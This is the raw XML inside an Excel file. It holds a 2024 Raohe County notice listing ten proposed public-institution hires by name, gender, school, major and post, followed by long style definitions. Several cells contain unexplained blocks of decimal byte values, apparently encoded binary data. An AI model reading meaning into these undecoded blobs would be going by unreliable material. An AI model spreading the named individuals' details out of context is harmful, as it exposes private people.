    <t xml:space="preserve">226 154 170 51 228 91 127 159 46 239 57 154 37 239 170 205 144 139 102 102 200 63 237 202 144 95 125 61 83 254 37 240 255 37 132 249 20 120 119 229 129 60 112 191 188 34 83 206 41 74 151 159 249 143 52 249 98 124 134 220 210 145 33 159 152 152 37 191 147 146 37 231 190 145 37 191 5 105 101 64 62 63 123 97 137 252 220 154 116 249 191 236 153 242 143 33 237 55 64 254 37 73 153 242 67 240 123 183 48 157 148 31 83 196 98 250 220 19 78 182 5 48 109 60 95 12 155 4 254 124 106 248 226 88 125 98 147 213 9 180 141 232 17 162 133 68 29 68 187 136 38 19 189 72 180 148 104 55 209 83 68 15 18 245 18 125 153 104 42 81 51 209 62 162 140 211 241 72 95 163 251 114 162 187 136 14 16 189 71 212 67 52 141 104 22 81 39 209 26 162 183 136 174 35 106 33 110 115 232 254 50 209 60 162 110 162 55 136 246 242 144 68 15 19 189 74 244 1 209 219 68 167 18 157 73 180 149 168 157 104 34 209 179 68 55 19 237 33 218 78 180 159 232 105 162 39 137 46 35 106 229 121 39 217 142 211 125 39 209 125 68 23 19 189 67 244 16 209 6 162 57 68 175 88 241 237 184 91 39 58 89 223 221 160 54 164 67 183 165 113 235 205 132 35 45 47 207 207 62 177 96 153 180 227 191 207 136 159 127 224 155 157 155 141 38 219 132 5 141 5 140 142 30 89 56 15 159 226 70 186 119 146 147 174 169 112 197 208 121 41 156 163 94 239 242 8 248 89 28 78 218 63 106 152 136 225 248 38 212 237 147 201 204 3 238 94 120 142 223 87 113 255 166 108 213 146 199 250 167 167 135 213 165 221 97 174 49 65 11 33 253 83 156 44 49 25 210 235 119 80 130 22 22 218 173 198 95 182 204 4 222 136 189 19 156 172 149 113 35 40 184 81 230 143 210 222 209 180 166 183 158 5 179 169 187 163 143 63 90 190 122 33 77 231 44 39 187 5 153 193 60 173 198 118 0 215 116 250 253 37 183 83 222 2 169 237 132 235 14 182 133 126 125 173 253 170 91 251 109 180 102 169 94 211 239 197 31 245 97 216 6 163 219 253 127 3 88 239 180 189 246 52 </t>
  </si>
  <si>
    <t xml:space="preserve">168 31 175 65 189 209 218 67 42 184 223 219 253 120 203 231 5 62 231 137 77 199 190 243 155 154 247 218 199 208 185 218 38 106 43 122 232 1 183 102 137 7 1 121 46 158 200 121 117 78 226 97 173 14 126 189 2 97 227 180 254 23 191 7 183 241 214 144 95 95 211 236 113 45 208 87 105 150 202 240 59 94 28 80 243 28 11 125 57 70 91 241 252 27 93 147 219 229 241 44 90 72 31 42 75 242 132 149 95 52 72 138 227 34 182 101 74 215 204 174 44 12 201 250 106 15 56 30 233 246 74 106 175 27 251 130 211 87 177 163 186 170 246 50 254 209 83 240 156 87 227 241 208 135 95 224 203 45 199 54 146 97 222 149 200 163 16 226 109 22 188 111 232 121 247 134 120 123 7 241 14 179 27 161 109 111 7 221 8 248 45 177 138 90 38 99 67 219 93 224 159 50 7 255 96 21 191 183 233 45 45 172 14 179 180 192 68 188 193 191 243 102 108 164 118 34 52 158 92 110 254 171 125 110 83 133 231 11 243 18 105 107 1 97 28 99 131 194 159 222 122 241 228 119 215 78 177 190 213 202 190 199 178 150 189 133 111 254 133 87 58 139 221 101 43 217 220 130 125 59 206 183 222 216 145 190 237 251 237 203 220 73 149 41 37 146 67 43 59 252 136 141 163 254 39 155 187 154 210 158 229 79 39 149 174 160 116 240 157 242 120 220 31 253 144 111 175 235 215 30 238 19 153 2 231 139 54 147 180 189 241 202 202 29 91 170 138 93 213 57 46 180 189 90 237 13 250 173 108 220 57 200 175 172 170 177 196 229 5 42 220 104 87 24 42 116 181 238 121 105 147 55 247 5 157 59 167 185 129 223 175 110 116 161 113 225 32 175 188 70 87 83 179 199 155 237 118 85 63 175 247 135 123 52 204 174 221 99 98 116 191 14 143 204 115 109 207 174 242 120 244 242 232 188 215 213 232 252 243 235 169 169 4 221 208 130 10 240 235 68 100 126 87 214 53 213 234 203 1 221 165 245 27 234 106 53 63 16 134 155 75 70 59 230 141 193 112 16 162 180 94 68 230 225 188 141 217 85 222 208 125 125 195 206 32 95 204 59 149 154 206 13 97 214 213 54 133 202 118 141 171 14 </t>
  </si>
  <si>
    <t xml:space="preserve">219 161 107 21 157 147 200 19 211 158 173 93 28 42 115 136 23 150 183 13 91 48 130 62 159 107 235 106 189 97 233 134 165 35 210 102 58 185 33 72 89 149 39 84 86 193 124 64 29 8 150 63 220 135 229 105 125 93 80 70 173 79 197 241 89 187 239 156 18 49 23 21 254 87 116 240 17 128 222 189 33 112 103 239 157 100 55 14 231 53 175 82 103 84 227 127 2 175 47 222 105 135 94 180 164 236 89 191 235 206 165 220 126 43 4 88 116 211 95 113 207 95 49 224 175 232 241 87 92 244 87 156 242 87 116 249 43 142 251 43 14 158 193 169 208 162 110 229 156 23 146 252 228 251 254 163 13 112 245 31 245 16 117 19 45 39 154 71 52 139 104 26 209 84 162 22 162 3 15 145 246 17 189 65 244 50 209 139 68 59 137 30 6 74 201 41 231 90 31 98 98 178 73 181 225 108 47 176 4 103 144 129 229 56 215 252 232 31 240 116 5 27 78 98 11 21 31 10 80 168 218 112 50 27 232 15 140 83 58 144 95 113 153 90 52 245 230 7 190 238 111 37 201 83 221 87 82 157 172 12 194 224 228 119 81 247 222 115 24 98 73 82 71 247 103 55 2 253 138 130 12 84 27 78 143 183 250 62 77 218 55 23 186 222 211 102 38 181 249 125 14 120 112 6 181 123 252 10 101 199 231 68 170 96 6 47 249 240 5 204 156 236 100 151 124 152 49 236 175 149 14 188 83 20 44 134 192 52 154 123 95 115 247 66 218 110 243 100 77 118 245 221 192 85 69 193 2 228 57 82 175 23 186 19 39 163 191 223 183 153 248 150 139 57 159 66 105 22 41 29 152 92 177 226 67 174 133 242 98 69 193 0 69 170 13 103 245 126 223 213 135 24 7 11 50 142 36 192 59 37 255 56 228 7 30 243 132 84 27 78 175 149 142 52 206 7 217 21 114 33 129 57 50 43 150 205 170 13 39 226 123 47 38 243 124 225 216 194 243 133 70 194 149 220 227 16 1 93 144 44 46 44 182 250 186 147 246 161 198 137 204 100 21 144 245 93 27 192 226 193 114 85 109 184 52 224 101 172 38 249 126 194 134 87 154 253 15 121 105 254 4 179 238 255 17 214 18 165 163 47 88 156 </t>
  </si>
  <si>
    <t xml:space="preserve">234 53 46 88 22 4 241 255 136 138 89 20 118 57 61 141 154 59 121 129 200 31 47 44 197 151 198 31 102 241 172 231 241 24 229 84 174 161 18 80 109 184 130 114 207 130 233 240 71 254 81 161 138 70 245 164 72 84 52 107 161 90 156 167 175 58 139 110 10 78 170 13 151 40 242 12 33 131 106 59 196 157 92 64 238 228 121 57 61 73 95 121 74 100 85 188 99 81 212 226 197 171 182 78 94 207 133 240 169 156 43 247 228 217 83 124 13 60 229 227 92 80 11 15 130 75 40 165 3 29 197 110 180 165 173 218 22 83 149 193 55 163 16 45 84 242 187 32 224 157 65 85 197 194 217 166 242 36 203 121 121 69 43 225 81 90 177 77 229 121 50 5 43 14 14 181 129 13 93 197 216 128 79 82 186 253 84 85 251 68 85 245 31 237 37 247 13 17 86 161 88 192 184 143 103 30 253 33 181 195 220 179 147 60 55 244 64 113 224 186 49 48 13 87 146 88 11 119 66 92 40 93 173 236 177 116 3 185 93 190 110 239 138 173 123 179 76 205 79 43 249 61 144 67 92 137 6 242 187 158 90 153 236 247 157 5 86 75 87 90 27 147 84 219 102 238 29 32 63 37 217 135 61 163 191 99 51 56 62 22 79 161 81 130 11 194 248 126 230 93 182 117 239 211 166 230 12 37 183 167 48 156 99 183 224 152 40 56 146 135 146 200 217 41 155 144 93 162 198 14 93 212 106 76 238 238 73 88 212 81 222 32 138 84 148 24 224 73 39 74 32 63 174 161 177 223 192 46 87 189 30 184 10 89 12 228 37 198 17 111 168 252 228 15 101 214 64 141 89 82 109 103 233 157 36 138 214 97 75 164 58 215 42 172 17 242 242 89 72 229 51 103 152 185 57 223 43 125 60 42 84 96 32 157 89 42 116 95 158 164 239 208 176 43 11 249 104 162 42 202 46 117 72 33 221 87 33 206 240 88 229 183 1 31 159 135 87 192 6 170 128 33 62 91 47 229 238 195 30 208 203 11 20 135 143 66 55 46 194 85 27 110 83 20 246 5 238 105 189 147 162 180 242 74 70 97 69 160 169 212 69 232 163 221 166 160 135 121 208 78 170 143 84 90 184 27 242 209 158 207 241 69 </t>
  </si>
  <si>
    <t xml:space="preserve">186 111 225 75 228 45 36 48 141 182 76 174 105 239 52 247 32 132 197 253 147 211 15 38 225 171 199 246 113 134 186 55 106 224 151 124 216 0 22 195 240 224 87 176 178 239 189 99 13 244 248 199 4 148 7 56 18 126 205 236 95 101 9 248 204 216 69 174 74 132 218 98 133 128 74 254 193 162 96 151 214 75 217 182 67 207 112 227 97 168 69 6 150 119 106 163 76 254 69 109 20 40 167 225 134 54 104 174 131 204 235 82 131 21 15 203 147 154 142 146 127 170 72 72 219 158 170 181 86 33 109 223 67 109 188 59 78 210 14 232 165 189 163 147 246 222 67 146 22 82 46 226 221 179 214 189 170 239 98 248 43 1 171 127 124 160 208 236 47 50 7 10 45 254 34 75 192 153 232 95 153 40 75 238 147 148 185 83 80 132 180 27 117 13 10 238 6 101 111 142 168 194 215 121 250 103 33 220 105 18 202 23 42 194 171 84 186 88 8 202 134 139 197 193 126 132 15 147 148 112 79 192 2 162 230 153 65 206 64 158 197 255 53 74 120 85 34 151 137 122 26 144 203 119 11 175 43 205 129 14 100 138 210 249 110 147 143 94 192 104 162 233 6 140 143 55 42 29 30 93 131 14 107 139 161 193 66 116 209 74 71 42 15 59 196 184 20 234 96 47 132 87 69 100 109 21 172 7 215 218 252 30 237 125 99 53 0 114 10 73 87 145 12 1 178 40 192 113 244 56 8 36 172 17 224 70 226 133 64 254 237 26 63 233 250 86 62 183 49 240 97 197 133 131 26 28 3 240 204 10 237 131 237 122 146 13 210 71 210 96 63 60 59 4 120 2 240 117 192 183 1 175 3 254 22 240 30 160 37 141 177 20 192 57 128 78 192 114 64 55 224 14 192 253 128 71 0 95 3 60 11 88 34 177 182 119 224 122 11 240 46 224 0 224 168 217 140 205 0 92 8 232 4 60 6 97 138 225 186 25 208 11 184 27 240 18 248 93 6 60 4 247 39 240 25 220 95 1 60 5 247 151 1 223 3 236 3 252 20 15 104 77 135 181 41 224 76 192 197 128 121 128 223 0 252 87 8 15 235 160 54 55 220 127 19 176 29 240 8 224 247 0 223 6 124 15 240 54 224 61 64 243 </t>
  </si>
  <si>
    <t xml:space="preserve">83 176 86 5 76 5 76 7 92 12 152 243 20 47 143 72 29 170 202 236 181 213 245 180 204 174 172 170 145 43 183 54 120 171 234 88 172 245 86 180 245 142 126 29 66 28 106 106 119 84 110 207 88 28 226 216 232 218 190 96 200 149 24 95 97 69 95 151 13 177 146 141 182 210 12 73 176 104 161 110 197 203 133 30 106 253 171 173 175 98 172 128 117 171 34 253 106 54 44 197 5 25 181 97 50 52 106 94 80 198 77 181 161 82 205 118 63 223 228 125 126 56 235 195 200 117 183 88 55 195 219 244 120 86 55 215 209 249 240 98 225 44 202 186 138 191 190 168 171 89 144 226 133 70 93 14 171 93 13 222 188 170 186 26 143 171 145 133 189 173 200 92 208 203 20 111 188 144 199 195 227 174 163 172 52 195 215 174 225 43 79 146 192 83 191 109 208 123 26 84 106 220 43 230 138 91 191 194 14 139 21 206 185 49 202 238 70 248 186 155 13 185 3 129 59 28 95 176 31 17 109 191 33 123 173 254 29 68 174 174 245 171 124 96 181 189 217 195 227 68 180 58 109 87 131 158 185 90 27 98 174 242 117 187 47 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 127 25 128 191 161 207 162 163 14 233 52 111 86 206 88 27 234 215 57 225 138 159 114 210 132 85 141 80 56 19 233 31 183 197 240 63 60 200 63 142 45 104 198 223 231 179 182 133 112 189 12 215 69 205 100 208 102 80 124 212 1 29 24 36 23 215 239 180 152 162 251 167 198 240 79 139 225 159 5 151 194 149 192 79 2 25 132 142 117 121 54 215 19 215 220 237 217 60 190 230 238 202 97 172 79 23 254 240 26 70 231 159 117 69 156 226 104 161 115 12 203 88 9 171 164 179 96 139 225 110 45 91 207 10 192 141 167 190 174 102 220 152 238 57 243 239 31 134 126 85 192 88 164 253 17 51 27 108 145 36 135 104 25 233 92 106 231 122 173 101 117 116 98 21 194 76 138 85 10 79 209 30 76 147 208 235 228 231 232 32 140 54 119 153 209 238 137 9 100 242 138 147 194 182 69 225 148 67 97 28 108 49 224 211 116 93 69 101 51 135 180 103 </t>
  </si>
  <si>
    <t xml:space="preserve">53 123 209 152 198 78 200 81 21 217 164 65 64 75 100 219 137 43 234 131 78 128 176 92 255 187 134 53 147 174 167 62 108 164 102 56 35 254 168 29 172 201 19 126 14 16 2 234 143 59 132 17 3 7 133 13 231 31 25 35 60 252 56 8 191 86 28 24 211 8 87 212 111 13 73 212 68 86 210 106 232 152 23 70 117 31 45 75 175 167 82 218 70 121 226 250 176 92 182 186 168 241 230 209 81 52 174 224 251 140 99 118 187 68 109 2 107 202 130 102 187 221 74 150 113 176 30 45 108 182 90 185 11 107 217 162 102 180 37 161 153 115 208 172 231 116 199 108 177 162 229 181 181 137 179 86 219 240 22 176 141 117 119 99 44 149 254 81 57 154 46 248 167 210 55 218 33 251 1 75 127 11 82 85 237 111 105 96 73 16 186 191 129 241 43 11 187 82 163 77 106 99 227 122 241 102 220 93 126 233 29 86 95 195 229 0 60 0 237 28 58 155 110 200 125 119 2 96 82 20 220 195 216 37 85 23 71 229 54 55 236 188 111 10 150 83 155 244 213 150 211 159 20 14 168 9 13 122 151 170 38 180 8 15 11 255 164 158 208 194 61 180 79 236 218 243 160 187 129 133 185 67 69 253 85 184 219 219 245 238 144 11 221 232 186 123 87 115 135 187 16 134 114 253 31 131 26 21 206 171 234 3 182 7 26 192 116 24 163 18 0 241 186 103 128 153 212 225 227 10 117 32 78 85 7 86 168 234 125 53 54 132 215 115 83 180 33 66 47 235 16 242 46 219 163 94 120 48 125 96 197 131 132 251 234 131 233 128 123 238 171 159 171 67 227 121 245 254 131 229 234 253 11 231 213 129 101 43 224 250 197 242 14 89 94 221 127 254 242 50 102 113 6 24 96 128 1 6 24 48 124 248 95 253 </t>
  </si>
  <si>
    <t>附件1：</t>
  </si>
  <si>
    <t>饶河县2024年事业单位面向社会引进高学历人才拟聘人员公示表</t>
  </si>
  <si>
    <t>序号</t>
  </si>
  <si>
    <t>姓名</t>
  </si>
  <si>
    <t>性别</t>
  </si>
  <si>
    <t>毕业院校</t>
  </si>
  <si>
    <t>专业</t>
  </si>
  <si>
    <t>学历</t>
  </si>
  <si>
    <t>拟聘岗位</t>
  </si>
  <si>
    <t>岗位代码</t>
  </si>
  <si>
    <t>乔月莹</t>
  </si>
  <si>
    <t>女</t>
  </si>
  <si>
    <t>哈巴罗夫斯克太平洋国立大学</t>
  </si>
  <si>
    <t>国际管理</t>
  </si>
  <si>
    <t>硕士</t>
  </si>
  <si>
    <t>饶河县纪委监委执纪审查服务中心</t>
  </si>
  <si>
    <t>016</t>
  </si>
  <si>
    <t>高继业</t>
  </si>
  <si>
    <t>男</t>
  </si>
  <si>
    <t>启明大学（韩国）</t>
  </si>
  <si>
    <t>贸易实务</t>
  </si>
  <si>
    <t>饶河县价格认定信息中心</t>
  </si>
  <si>
    <t>017</t>
  </si>
  <si>
    <t>田德伟</t>
  </si>
  <si>
    <t>哈尔滨师范大学</t>
  </si>
  <si>
    <t>汉语国际教育</t>
  </si>
  <si>
    <t>饶河县粮食服务中心</t>
  </si>
  <si>
    <t>018</t>
  </si>
  <si>
    <t>祝名</t>
  </si>
  <si>
    <t>蒙古研究大学</t>
  </si>
  <si>
    <t>工商管理</t>
  </si>
  <si>
    <t>饶河县县域经济发展研究中心</t>
  </si>
  <si>
    <t>019</t>
  </si>
  <si>
    <t>陈阳</t>
  </si>
  <si>
    <t>东北石油大学</t>
  </si>
  <si>
    <t>地球探测与信息技术</t>
  </si>
  <si>
    <t>饶河县土地利用监测和综合治理中心</t>
  </si>
  <si>
    <t>020</t>
  </si>
  <si>
    <t>曹友议</t>
  </si>
  <si>
    <t>哈尔滨体育学院</t>
  </si>
  <si>
    <t>体育教育训练学</t>
  </si>
  <si>
    <t>饶河县村镇建设指导服务中心</t>
  </si>
  <si>
    <t>021</t>
  </si>
  <si>
    <t>马祥瑞</t>
  </si>
  <si>
    <t>沈阳化工大学</t>
  </si>
  <si>
    <t>材料工程</t>
  </si>
  <si>
    <t>饶河县中小企业发展服务中心</t>
  </si>
  <si>
    <t>022</t>
  </si>
  <si>
    <t>林雪</t>
  </si>
  <si>
    <t>黑龙江大学</t>
  </si>
  <si>
    <t>中国哲学</t>
  </si>
  <si>
    <t>饶河县图书馆</t>
  </si>
  <si>
    <t>023</t>
  </si>
  <si>
    <t>王奥</t>
  </si>
  <si>
    <t>长春师范大学</t>
  </si>
  <si>
    <t>学科教育（音乐）</t>
  </si>
  <si>
    <t>饶河县退役军人服务中心</t>
  </si>
  <si>
    <t>024</t>
  </si>
  <si>
    <t>王其琛</t>
  </si>
  <si>
    <t>海南大学</t>
  </si>
  <si>
    <t>材料科学与工程</t>
  </si>
  <si>
    <t>饶河县检验检测中心</t>
  </si>
  <si>
    <t>025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</si>
</sst>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2"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="20"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <name val="宋体"/>
      <charset val="134"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="10"/>
      <color indexed="8"/>
      <name val="Arial"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="12"/>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52"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="52"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="62"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <i/>
      <sz val="11"/>
      <color indexed="23"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="17"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="15"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="20"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="60"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="63"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color indexed="9"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="13"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="10"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <b/>
      <sz val="18"/>
      <color indexed="56"/>
      <name val="宋体"/>
      <charset val="134"/>
    </font>
    <font>
      <sz val="11"/>
      <color indexed="8"/>
      <name val="Tahoma"/>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indexed="31"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="10"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="62"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="22"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="47"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="52"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="49"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="51"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="29"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="46"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="42"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="45"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="44"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="11"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="30"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="43"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="55"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="36"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="27"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="57"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor indexed="53"/>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s>
  <cellStyleXfs count="705">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33" borderId="11" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="29" fillId="0" borderId="13" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="35" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="36" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="37" borderId="14" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="38" borderId="14" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="39" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="40" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="41" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="42" borderId="0" applyNumberFormat="0" applyBorder="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33" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="34" fillId="0" borderId="0" applyNumberFormat="0" applyFill="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="32" fillId="38" borderId="14" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="5" fillId="0" borderId="0">
      <alignment vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="42" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="39" borderId="0" applyNumberFormat="0" applyBorder="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35" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="36" fillId="0" borderId="15" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="45" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="40" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="39" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="45" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="47" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="37" fillId="45" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="41" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="45" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="31" fillId="37" borderId="14" applyNumberFormat="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="43" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="35" fillId="44" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="34" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="27" fillId="0" borderId="12" applyNumberFormat="0" applyFill="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="30" fillId="48" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="33" borderId="11" applyNumberFormat="0" applyFont="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="28" fillId="46" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0">
      <alignment vertical="center"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="0" borderId="0">
      <alignment vertical="center"/>
    </xf>
